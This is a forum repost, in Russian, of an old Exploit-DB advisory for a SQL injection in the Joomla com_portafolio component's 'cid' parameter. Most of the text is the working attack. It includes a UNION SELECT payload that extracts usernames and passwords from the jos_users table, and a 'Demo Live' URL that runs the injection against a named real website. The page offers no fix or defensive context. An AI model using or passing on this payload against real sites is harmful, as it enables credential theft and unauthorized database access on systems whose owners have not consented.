Exploit Joomla! Component com_portafolio - 'cid' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
8905
Проверка EDB
  1. Пройдено
Автор
CHIP D3 BI0S
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2009-06-08
Код:
----------------------------------------------------------------------
Joomla Component com_portafolio (cid) SQL injection Vulnerability
----------------------------------------------------------------------

 ###################################################
 [+] Author        :  Chip D3 Bi0s
 [+] Email         :  chipdebios[alt+64]gmail.com
 [+] Vulnerability :  SQL injection
 ###################################################

________________________________________________________

Example:

 http://localHost/path/index.php?option=com_portafolio&task=viewcat&cid=<sql Code>

 <Sql Code>:
 -null+union+select+1,2,3,4,5,6,7,concat(username,0x3a,password),9+jos_users--&Itemid=5
 

Demo Live:
	
In this example, you took the time to rename the table:jos_users
which is normally using joomla

http://www.garboweb.com/index.php?option=com_portafolio&task=viewcat&cid=-null+and+1=2+union+select+1,2,3,4,5,6,7,user(),9--&Itemid=5


+++++++++++++++++++++++++++++++++
[!] Produced in South America
------------------------------------

# milw0rm.com [2009-06-08]
 
Источник
www.exploit-db.com

Похожие темы